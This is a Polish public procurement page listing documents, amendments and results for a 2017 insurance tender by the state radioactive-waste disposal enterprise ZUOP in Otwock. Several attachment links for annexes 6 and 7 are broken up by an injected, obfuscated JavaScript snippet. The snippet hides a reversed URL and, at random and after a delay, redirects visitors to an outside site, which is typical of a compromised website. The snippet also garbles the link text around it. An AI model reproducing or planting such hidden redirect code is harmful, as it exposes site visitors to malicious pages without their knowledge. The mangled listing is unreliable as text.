Data dodania: 2017-09-06 godz. 14:17

Data ogłoszenia: 2017-09-06

Usługa ubezpieczenia Zakładu Unieszkodliwiania Odpadów Promieniotwórczych – Przedsiębiorstwa Państwowego w Otwocku

Znak sprawy 5/ubezpieczenie ZUOP/2017

OGŁOSZENIE O ZAMÓWIENIU

SIWZ NIEOGRANICZONY_ZUOP

Załącznik nr 1 do SIWZ_PD Opis przedmiotu zamówienia – warunki ubezpieczenia

Załącznik nr 2 do SIWZ_Informacje do oceny ryzyka

Załącznik nr 3 do SIWZ _Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej

Załącznik nr 4 do SIWZ_Oświadczenie dotyczące przesłanek wykluczenia z postępowania

Załącznik nr 5 do SIWZ_Oświadczenie dotyczące spełniania warunków udziału w postępowaniu

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(„”).reverse().join(„”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towy_cz.-1.doc”>Załącznik nr 6 do SIWZ_Formularz ofertowy_cz. 1

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(„”).reverse().join(„”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towy_cz.2.doc”>Załącznik nr 7 do SIWZ_Formularz ofertowy_cz.2

Załącznik nr 8 do SIWZ_Projekt umowy generalnej_cz.1.

Załącznik nr 9 do SIWZ_Projekt umowy generalnej_cz.2

Załącznik nr 10 do SIWZ_Wykaz mienia do ubezpieczenia

Załącznik nr 11 do SIWZ_Szkodowość

 

Data dodania: 2017-09-12 godz. 14:30

OGŁOSZENIE O ZMIANIE OGŁOSZENIA

Odpowiedzi na pytania modyfikacja SIWZ

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(„”).reverse().join(„”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towy_cz.21.doc”>Za$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(„”).reverse().join(„”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towy_cz.21.doc”>łącznik nr 7 do SIWZ_Formularz ofertowy_cz.2

Załącznik nr 8 do SIWZ_Projekt umowy generalnej_cz.1.

Załącznik nr 9 do SIWZ_Projekt umowy generalnej_cz.2

 

Załącznik nr 1 do SIWZ_PD Opis przedmiotu zamówienia – warunki ubezpieczenia

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(„”).reverse().join(„”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towy_cz.-11.doc”>Załącznik nr 6 do SIWZ_Formularz ofertowy_cz. 1

 

Data dodania: 2017-09-15 godz. 11:59

OGŁOSZENIE O ZMIANIE OGŁOSZENIA

SIWZ NIEOGRANICZONY_ZUOP

Modyfikacja SIWZ

 

Data dodania: 2017-09-18 godz. 13:48

Informacje z otwarcia ofert

 

Data dodania: 2017-09-22 godz.9:38

Zawiadomienie o wynikach_CZĘŚĆ PIERWSZA

 

Data dodania: 2017-09-22 godz. 12:47

Zawiadomienie o wynikach – CZĘŚĆ DRUGA